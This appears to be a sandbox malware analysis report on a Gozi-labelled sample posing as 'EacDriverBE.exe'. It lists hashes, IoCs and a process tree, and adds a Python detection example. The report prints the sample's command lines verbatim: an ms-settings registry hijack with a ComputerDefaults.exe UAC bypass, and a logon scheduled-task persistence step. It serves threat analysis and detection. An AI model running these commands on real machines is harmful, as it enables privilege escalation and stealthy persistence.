Analysis
- max time kernel: 49s
- max time network: 48s
- platform: windows10-1703_x64
- resource: win10-20240404-en
- resource tags: arch:x64, arch:x86, image:win10-20240404-en, locale:en-us, os:windows10-1703-x64, system
- submitted: 27-05-2024 16:05
- Static task: static1
- Behavioral task: behavioral1 (Sample: EacDriverBE.exe, Resource: win10-20240404-en)
- Behavioral task: behavioral2 (Sample: obs.exe, Resource: win10-20240404-en)
General
- Target: EacDriverBE.exe
- Size: 11KB
- MD5: c6b2c74b647dcbbea223c51925c5c7dd
- SHA1: 071fa2b1394d2c95553149fd5eb643e0291927b3
- SHA256: c5f1d37d96ed0788783f626a376144f85887a182155fed3b637744d9d9215a22
- SHA512: ff1d378751d2722c165293b1dbefccc9aad42cb653f20178bbcbbc3318d6da0592e9099b7030f268c7cd60bc3e782ed2d66ddbf485391596f659b1e4c3c47b6c
- SSDEEP: 192:5S8JnK2fj6JIFjsJwpVwP456gijoVIgMa42JjrUxF59ooFIda:5S92L5FIJw/wgAjE7MeJvYooFi
Malware Config
Extracted
gozi
Signatures
-
Executes dropped EXE (2 IoCs)
Processes:
  PID   Process
  3456  skn4f5g0.exe
  2544  o0no53td.exe
-
Loads dropped DLL (1 IoC)
Processes:
  PID   Process
  600   EacDriverBE.exe
Legitimate hosting services abused for malware hosting/C2 (1 TTP, 4 IoCs)
Processes:
  Flow  IoC
  9     discord.com
  1     raw.githubusercontent.com
  2     raw.githubusercontent.com
  8     discord.com
-
Looks up external IP address via web service (1 IoC)
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
  Flow  IoC
  11    checkip.amazonaws.com
Drops file in Windows directory (2 IoCs)
Processes:
  Description   IoC                                                        Process
  File created  C:\Windows\rescache\_merged\4183903823\2290032291.pri     taskmgr.exe
  File created  C:\Windows\rescache\_merged\1601268389\715946058.pri      taskmgr.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) (3 TTPs, 3 IoCs)
SCSI information is often read in order to detect sandboxing environments.
Processes:
  Description        IoC                                                                                                                                                                      Process
  Key opened         \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A   taskmgr.exe
  Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName                                              taskmgr.exe
  Key opened         \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000                                                           taskmgr.exe
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies registry class (7 IoCs)
The ms-settings\shell\open\command key under the user's Classes hive is the protocol handler that auto-elevating binaries such as ComputerDefaults.exe (and fodhelper.exe) resolve from HKCU; writing a command there and clearing DelegateExecute, then launching the auto-elevating binary (see the process tree below), is a well-known UAC bypass. Note that the writes land in the per-user hive (S-1-5-21-...-1000_Classes), so no administrative rights are needed to plant them.
Processes:
  Description      IoC                                                                                                                   Process
  Set value (str)  \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"   reg.exe
  Key created      \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\ms-settings\shell\open\command                   reg.exe
  Key created      \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\ms-settings                                      reg.exe
  Key created      \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\ms-settings\shell                                reg.exe
  Key created      \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\ms-settings\shell\open                           reg.exe
  Set value (str)  \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\ms-settings\shell\open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\consoledamage374.vbs"   reg.exe
  Key created      \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\ms-settings\shell\open\command                   reg.exe
Suspicious behavior: EnumeratesProcesses (64 IoCs)
Processes:
  PID   Process          Occurrences
  600   EacDriverBE.exe  62
  3456  skn4f5g0.exe     2
-
Suspicious behavior: GetForegroundWindowSpam (1 IoC)
Processes:
  PID   Process
  3404  Explorer.EXE
-
Suspicious use of AdjustPrivilegeToken (24 IoCs)
Processes:
  Token                      PID   Process          Occurrences
  SeDebugPrivilege           600   EacDriverBE.exe  1
  SeDebugPrivilege           3456  skn4f5g0.exe     1
  SeShutdownPrivilege        3404  Explorer.EXE     9
  SeCreatePagefilePrivilege  3404  Explorer.EXE     9
  SeDebugPrivilege           392   taskmgr.exe      1
  SeSystemProfilePrivilege   392   taskmgr.exe      1
  SeCreateGlobalPrivilege    392   taskmgr.exe      1
  SeDebugPrivilege           2544  o0no53td.exe     1
-
Suspicious use of FindShellTrayWindow (33 IoCs)
Processes:
  PID   Process               Occurrences
  4908  ComputerDefaults.exe  1
  392   taskmgr.exe           30
  3404  Explorer.EXE          2
-
Suspicious use of SendNotifyMessage (44 IoCs)
Processes:
  PID   Process       Occurrences
  392   taskmgr.exe   30
  3404  Explorer.EXE  14
Suspicious use of WriteProcessMemory (50 IoCs)
The cross-process writes from the two dropped executables go to the process each was handed on its command line (skn4f5g0.exe explorer.exe, o0no53td.exe Taskmgr.exe), which is consistent with the sample injecting into the named process; the remaining writes are ordinary parent-to-child writes at process creation.
Processes:
  Source PID  Source process   Target PID  Target process         Occurrences
  600         EacDriverBE.exe  1940        reg.exe                3
  600         EacDriverBE.exe  752         reg.exe                3
  600         EacDriverBE.exe  3076        cmd.exe                3
  3076        cmd.exe          4908        ComputerDefaults.exe   3
  600         EacDriverBE.exe  1900        cmd.exe                3
  1900        cmd.exe          2040        schtasks.exe           3
  600         EacDriverBE.exe  3456        skn4f5g0.exe           2
  3456        skn4f5g0.exe     3404        Explorer.EXE           13
  3404        Explorer.EXE     392         taskmgr.exe            2
  600         EacDriverBE.exe  2544        o0no53td.exe           2
  2544        o0no53td.exe     392         taskmgr.exe            13
Processes
Image paths are as recorded by the sandbox: the sample and its children run under SysWOW64 (32-bit), so the System32 paths in their command lines are redirected. Indentation shows the parent/child relationship.
- C:\Windows\Explorer.EXE (PID 3404)
  Command line: C:\Windows\Explorer.EXE
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  - C:\Users\Admin\AppData\Local\Temp\EacDriverBE.exe (PID 600)
    Command line: "C:\Users\Admin\AppData\Local\Temp\EacDriverBE.exe"
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\reg.exe (PID 1940)
      Command line: "C:\Windows\system32\reg.exe" add "HKCU\Software\Classes\ms-settings\shell\open\command" /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\consoledamage374.vbs" /f
      - Modifies registry class
    - C:\Windows\SysWOW64\reg.exe (PID 752)
      Command line: "C:\Windows\system32\reg.exe" add "HKCU\Software\Classes\ms-settings\shell\open\command" /v DelegateExecute /d "0" /f
      - Modifies registry class
    - C:\Windows\SysWOW64\cmd.exe (PID 3076)
      Command line: "cmd.exe" /C computerdefaults.exe
      - Suspicious use of WriteProcessMemory
      - C:\Windows\SysWOW64\ComputerDefaults.exe (PID 4908)
        Command line: computerdefaults.exe
        - Suspicious use of FindShellTrayWindow
    - C:\Windows\SysWOW64\cmd.exe (PID 1900)
      Command line: "C:\Windows\System32\cmd.exe" /C schtasks /Create /SC ONLOGON /TN JavaAutoUpdateTask_wwf7vChHJBMBk7lWy050MX /TR "C:\Users\Admin\AppData\Local\Microsoft\Windows\GameExplorer\wwf7vChHJBMBk7lWy050MX.exe" /RL HIGHEST /IT
      - Suspicious use of WriteProcessMemory
      - C:\Windows\SysWOW64\schtasks.exe (PID 2040)
        Command line: schtasks /Create /SC ONLOGON /TN JavaAutoUpdateTask_wwf7vChHJBMBk7lWy050MX /TR "C:\Users\Admin\AppData\Local\Microsoft\Windows\GameExplorer\wwf7vChHJBMBk7lWy050MX.exe" /RL HIGHEST /IT
        - Creates scheduled task(s)
    - C:\Users\Admin\AppData\Local\Temp\skn4f5g0.exe (PID 3456)
      Command line: "C:\Users\Admin\AppData\Local\Temp\skn4f5g0.exe" explorer.exe
      - Executes dropped EXE
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
    - C:\Users\Admin\AppData\Local\Temp\o0no53td.exe (PID 2544)
      Command line: "C:\Users\Admin\AppData\Local\Temp\o0no53td.exe" Taskmgr.exe
      - Executes dropped EXE
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
  - C:\Windows\system32\taskmgr.exe (PID 392)
    Command line: "C:\Windows\system32\taskmgr.exe" /4
    - Drops file in Windows directory
    - Checks SCSI registry key(s)
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
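Added example, not part of the sandbox report or the sample: a small Python detection pass over process and registry event records transcribed from the process tree and the "Modifies registry class" IoCs above. It flags the two behaviours that matter most for triage here: the ms-settings handler hijack followed by an auto-elevating binary started from the same non-shell ancestor (the UAC bypass), and a logon-triggered scheduled task with /RL HIGHEST whose target lives in a user-writable directory. The record layout (pid, ppid, image, cmdline and pid, key, value_name, data) is this example's own convention rather than any EDR schema, PROCS/REG are constructed input, and fodhelper.exe is included as an assumption about the technique, not something this sample used.

```python
"""Replay two of this report's behaviours as detection rules over event records.

Added example, not code from the sandbox or the sample. PROCS/REG are
constructed from the process tree and registry IoCs in the report; the record
layout is this example's own convention, not a particular EDR schema.
"""
import re
from collections import namedtuple

Proc = namedtuple("Proc", "pid ppid image cmdline")
RegWrite = namedtuple("RegWrite", "pid key value_name data")

# Auto-elevating binaries that resolve the ms-settings: handler from HKCU.
# ComputerDefaults.exe is what this sample used; fodhelper.exe is assumed here
# as the other well-known consumer of the same key.
AUTO_ELEVATORS = {"computerdefaults.exe", "fodhelper.exe"}
MS_SETTINGS_HANDLER = re.compile(r"\\ms-settings\\shell\\open\\command$", re.I)
# Directories a standard user can write to; a HIGHEST task pointing here is suspect.
USER_WRITABLE = re.compile(r"\\users\\[^\\]+\\(appdata|downloads)\\|\\programdata\\|\\temp\\", re.I)
SCHTASKS_TR = re.compile(r'/tr\s+"?([^"]+?)"?(?:\s+/|$)', re.I)

# Constructed sample input, transcribed from the report (PIDs and command lines as recorded).
PROCS = [
    Proc(3404, 0, r"C:\Windows\Explorer.EXE", r"C:\Windows\Explorer.EXE"),
    Proc(600, 3404, r"C:\Users\Admin\AppData\Local\Temp\EacDriverBE.exe",
         r'"C:\Users\Admin\AppData\Local\Temp\EacDriverBE.exe"'),
    Proc(1940, 600, r"C:\Windows\SysWOW64\reg.exe",
         r'"C:\Windows\system32\reg.exe" add "HKCU\Software\Classes\ms-settings\shell\open\command" '
         r'/d "wscript.exe C:\Users\Admin\AppData\Local\Temp\consoledamage374.vbs" /f'),
    Proc(752, 600, r"C:\Windows\SysWOW64\reg.exe",
         r'"C:\Windows\system32\reg.exe" add "HKCU\Software\Classes\ms-settings\shell\open\command" '
         r'/v DelegateExecute /d "0" /f'),
    Proc(3076, 600, r"C:\Windows\SysWOW64\cmd.exe", r'"cmd.exe" /C computerdefaults.exe'),
    Proc(4908, 3076, r"C:\Windows\SysWOW64\ComputerDefaults.exe", "computerdefaults.exe"),
    Proc(1900, 600, r"C:\Windows\SysWOW64\cmd.exe",
         r'"C:\Windows\System32\cmd.exe" /C schtasks /Create /SC ONLOGON /TN JavaAutoUpdateTask_wwf7vChHJBMBk7lWy050MX '
         r'/TR "C:\Users\Admin\AppData\Local\Microsoft\Windows\GameExplorer\wwf7vChHJBMBk7lWy050MX.exe" /RL HIGHEST /IT'),
    Proc(2040, 1900, r"C:\Windows\SysWOW64\schtasks.exe",
         r'schtasks /Create /SC ONLOGON /TN JavaAutoUpdateTask_wwf7vChHJBMBk7lWy050MX '
         r'/TR "C:\Users\Admin\AppData\Local\Microsoft\Windows\GameExplorer\wwf7vChHJBMBk7lWy050MX.exe" /RL HIGHEST /IT'),
    Proc(392, 3404, r"C:\Windows\system32\taskmgr.exe", r'"C:\Windows\system32\taskmgr.exe" /4'),
]
HIJACKED_KEY = r"\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\ms-settings\shell\open\command"
REG = [
    RegWrite(1940, HIJACKED_KEY, "", r"wscript.exe C:\Users\Admin\AppData\Local\Temp\consoledamage374.vbs"),
    RegWrite(752, HIJACKED_KEY, "DelegateExecute", "0"),
]


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def ancestry(pid, by_pid):
    """pid followed by each parent up to the root; stops on unknown or looping ppids."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(pid)
        pid = by_pid[pid].ppid
    return chain


def detect_ms_settings_bypass(procs, reg_writes):
    """Handler command written under ...\\ms-settings\\shell\\open\\command, then an
    auto-elevating binary launched from the same non-shell ancestor as the writer."""
    by_pid = {p.pid: p for p in procs}
    writes = [w for w in reg_writes if MS_SETTINGS_HANDLER.search(w.key)]
    delegate_cleared = any(w.value_name.lower() == "delegateexecute" for w in writes)
    findings = []
    for w in writes:
        if w.value_name != "":          # only the (Default) value carries the command
            continue
        writer_chain = set(ancestry(w.pid, by_pid))
        for p in procs:
            if basename(p.image) not in AUTO_ELEVATORS:
                continue
            common = [a for a in ancestry(p.pid, by_pid)
                      if a in writer_chain and basename(by_pid[a].image) != "explorer.exe"]
            if common:                  # child-first order, so common[0] is the nearest shared ancestor
                findings.append({"rule": "uac_bypass_ms_settings", "origin_pid": common[0],
                                 "elevator_pid": p.pid, "payload": w.data,
                                 "delegate_execute_cleared": delegate_cleared})
    return findings


def detect_highest_logon_task(procs):
    """schtasks /Create ... /RL HIGHEST whose /TR target lives in a user-writable path."""
    findings = []
    for p in procs:
        if basename(p.image) != "schtasks.exe":
            continue
        cl = p.cmdline.lower()
        if "/create" not in cl or "/rl highest" not in cl:
            continue
        m = SCHTASKS_TR.search(p.cmdline)
        target = m.group(1) if m else ""
        if USER_WRITABLE.search(target):
            findings.append({"rule": "persistence_schtasks_highest_userdir", "pid": p.pid,
                             "trigger": "onlogon" if "/sc onlogon" in cl else "other",
                             "target": target})
    return findings


if __name__ == "__main__":
    for f in detect_ms_settings_bypass(PROCS, REG) + detect_highest_logon_task(PROCS):
        print(f)
```

The bypass rule keys on the registry write rather than on reg.exe's command line, so it also fires when the key is set through the API instead of reg.exe; tying the write and the auto-elevating launch to a shared ancestor below explorer.exe is what keeps an unrelated, legitimate ComputerDefaults.exe launch from matching.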
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 124KB
  MD5: e898826598a138f86f2aa80c0830707a
  SHA1: 1e912a5671f7786cc077f83146a0484e5a78729c
  SHA256: df443ccf551470b3f9f7d92faf51b3b85ae206dd08da3b6390ce9a6039b7253a
  SHA512: 6827068b8580822ded1fb8447bdb038d0e00633f5ef7f480a8cdeaab6928ac23022a0b7a925058e0926ce9b41a6c8c22a5692e074621b2fccdb7edd29a0d4cfb
- Filesize: 1.4MB
  MD5: 6f2fdecc48e7d72ca1eb7f17a97e59ad
  SHA1: fcbc8c4403e5c8194ee69158d7e70ee7dbd4c056
  SHA256: 70e48ef5c14766f3601c97451b47859fddcbe7f237e1c5200cea8e7a7609d809
  SHA512: fea98a3d6fff1497551dc6583dd92798dcac764070a350fd381e856105a6411c94effd4b189b7a32608ff610422b8dbd6d93393c5da99ee66d4569d45191dc8b